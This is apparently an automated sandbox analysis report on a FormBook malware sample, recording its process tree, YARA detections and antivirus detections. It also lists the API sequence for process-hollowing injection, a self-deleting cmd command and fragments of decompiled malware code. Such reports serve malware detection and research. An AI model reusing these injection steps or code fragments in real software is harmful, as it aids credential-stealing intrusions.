                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:38
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:387072 bytes
                                                                                                                                                      MD5 hash:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 42%, ReversingLabs
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:39
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:387072 bytes
                                                                                                                                                      MD5 hash:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:41
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:52
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                      Imagebase:0xed0000
                                                                                                                                                      File size:279552 bytes
                                                                                                                                                      MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:56
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0x4a890000
                                                                                                                                                      File size:302592 bytes
                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:57
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                        Executed Functions

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00220156
                                                                                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0022016C
                                                                                                                                                        • CreateProcessA.KERNEL32(?,00000000), ref: 00220255
                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00220270
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00220283
                                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002202C8
                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 002202E3
                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00220304
                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0022032A
                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00220399
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002203BF
                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 002203E1
                                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 002203ED
                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 002203F9
                                                                                                                                                        • ExitProcess.KERNELBASE(00000000), ref: 00220412
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$MemoryProcess$AllocWrite$Thread$CloseContextCreateExitFileFreeHandleModuleNameReadResumeSectionUnmapViewWow64
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3514283409-0
                                                                                                                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                        • Instruction ID: 24a121265c30a97c9c079e1bb0a97a9fa099663222518ea946392e89d0634932
                                                                                                                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                        • Instruction Fuzzy Hash: 41B1C774A00209AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00220533
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                        • API String ID: 716092398-2341455598
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 002205EC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID: apfHQ$o
                                                                                                                                                        • API String ID: 3188754299-2999369273
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 03EC9596
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2086232665.0000000003EC8000.00000040.00000001.sdmp, Offset: 03EC8000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FirstModule32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3757679902-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 03EC925E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2086232665.0000000003EC8000.00000040.00000001.sdmp, Offset: 03EC8000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: {2K
                                                                                                                                                        • API String ID: 0-870351520
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ?G)b
                                                                                                                                                        • API String ID: 0-455291697
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                        • Instruction ID: 332f51e855d62fbcc1f3865cae85a76812879b352f10a059fc7da19ff3592fa0
                                                                                                                                                        • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                        • Instruction Fuzzy Hash: 303182126586F14DD30E436D08BD675AEC18E5720174EC2FEDADA6F2F3C0888418D3A1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2131e98c72c42a44a6543b0f590bacb678a8333d2806488852c554c4286459bf
                                                                                                                                                        • Instruction ID: 8e2a9752b04de727483892bcc7f62ddda10f892f133184a8f47e2a1320eac6b5
                                                                                                                                                        • Opcode Fuzzy Hash: 2131e98c72c42a44a6543b0f590bacb678a8333d2806488852c554c4286459bf
                                                                                                                                                        • Instruction Fuzzy Hash: CA212D35A08355AFC719CFBCC4815ADFFA1EF89310B68C29DC8995B393C2724816C750
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2086232665.0000000003EC8000.00000040.00000001.sdmp, Offset: 03EC8000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction ID: f99191a0ae6f9d523ae7d5c7e42f6b8602ca5103455683db4abd787446f0e406
                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction Fuzzy Hash: 9811A172350200AFD744DF55DEC0FEA73EAEB88620B198169ED08CF316E675E802C760
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction ID: 36fb6f7d87f4710edc92918b0a4e3ee1a20c97347ccdcc309f284cc1cd3e3bb5
                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction Fuzzy Hash: D0117072350110AFE754DEA5ECD1FA673EAEB88320B298155E908CB312D675ED11C760
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
                                                                                                                                                        • Instruction ID: 74fc0706d39a7bc634382559c14bd00d220f343a0a708aa946c05706e07cdea6
                                                                                                                                                        • Opcode Fuzzy Hash: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
                                                                                                                                                        • Instruction Fuzzy Hash: 45C04C70A451585BDB0889799E127EA76988305211F1402BD780FC2244E55E591055A6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Executed Functions

                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID: R=A$R=A
                                                                                                                                                        • API String ID: 2738559852-3742021989
                                                                                                                                                        • Opcode ID: 909aa5a245d48812f77c58f933760682901bcd102153e38b1923f68efc9dfb02
                                                                                                                                                        • Instruction ID: 2ba84caaadc622240e861cb26b9ba5da1393a070836c945a2d03e797859a7331
                                                                                                                                                        • Opcode Fuzzy Hash: 909aa5a245d48812f77c58f933760682901bcd102153e38b1923f68efc9dfb02
                                                                                                                                                        • Instruction Fuzzy Hash: CB21B8B2200108AFDB14DF99DC81EEB77ADEF8C754F158649FA1DA7241CA34E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                        				void* _t18;
                                                                                                                                                        				void* _t27;
                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                        
                                                                                                                                                        				_t13 = _a4;
                                                                                                                                                        				_t28 = _a4 + 0xc48;
                                                                                                                                                        				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                        				_t6 =  &_a32; // 0x413d52
                                                                                                                                                        				_t12 =  &_a8; // 0x413d52
                                                                                                                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                                                        				return _t18;
                                                                                                                                                        			}







                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID: R=A$R=A
                                                                                                                                                        • API String ID: 2738559852-3742021989
                                                                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                                        			E004181BA(void* __ebx, void* __edi, void* _a1, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                        				void* _t28;
                                                                                                                                                        				long _t40;
                                                                                                                                                        				signed char _t42;
                                                                                                                                                        				void* _t62;
                                                                                                                                                        				intOrPtr* _t63;
                                                                                                                                                        
                                                                                                                                                        				_t61 = __edi - 1;
                                                                                                                                                        				if(__edi - 1 > 0) {
                                                                                                                                                        					 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | _t42;
                                                                                                                                                        					_t63 = _t28 + 0xc44;
                                                                                                                                                        					E00418DC0(_t61, _t28, _t63,  *((intOrPtr*)(_t28 + 0x10)), 0, 0x29);
                                                                                                                                                        					return  *((intOrPtr*)( *_t63))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t62);
                                                                                                                                                        				} else {
                                                                                                                                                        					asm("rcl byte [eax+eax*2-0x741374ab], 1");
                                                                                                                                                        					_t34 = _a4;
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					_t3 = _t34 + 0xc40; // 0xc40
                                                                                                                                                        					E00418DC0(_t61, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                        					_t40 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                        					return _t40;
                                                                                                                                                        				}
                                                                                                                                                        			}









                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: d06c22877cccc1304cd0d5e8a167a1d7dd7636f2f2587f7672da8cbc3b7c47e6
                                                                                                                                                        • Instruction ID: 82f27e5dbeb61c95509b8350a27b22fb312ef2eed5b6af0adeeb7139150ea748
                                                                                                                                                        • Opcode Fuzzy Hash: d06c22877cccc1304cd0d5e8a167a1d7dd7636f2f2587f7672da8cbc3b7c47e6
                                                                                                                                                        • Instruction Fuzzy Hash: 5B2108B2210149AFCB08DF99D884CEB77A9FF8C354B15868DF91D97202C634E851CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                        				char* _v8;
                                                                                                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                        				char _v536;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                        				void* _t30;
                                                                                                                                                        				void* _t31;
                                                                                                                                                        				void* _t32;
                                                                                                                                                        
                                                                                                                                                        				_t24 = _a8;
                                                                                                                                                        				_v8 =  &_v536;
                                                                                                                                                        				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                                                                                                        				_t31 = _t30 + 0xc;
                                                                                                                                                        				if(_t15 != 0) {
                                                                                                                                                        					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
                                                                                                                                                        					_t32 = _t31 + 4;
                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                        						E0041B1F0( &_v12, 0);
                                                                                                                                                        						_t32 = _t32 + 8;
                                                                                                                                                        					}
                                                                                                                                                        					_t18 = E00419300(_v8);
                                                                                                                                                        					_v16 = _t18;
                                                                                                                                                        					__eflags = _t18;
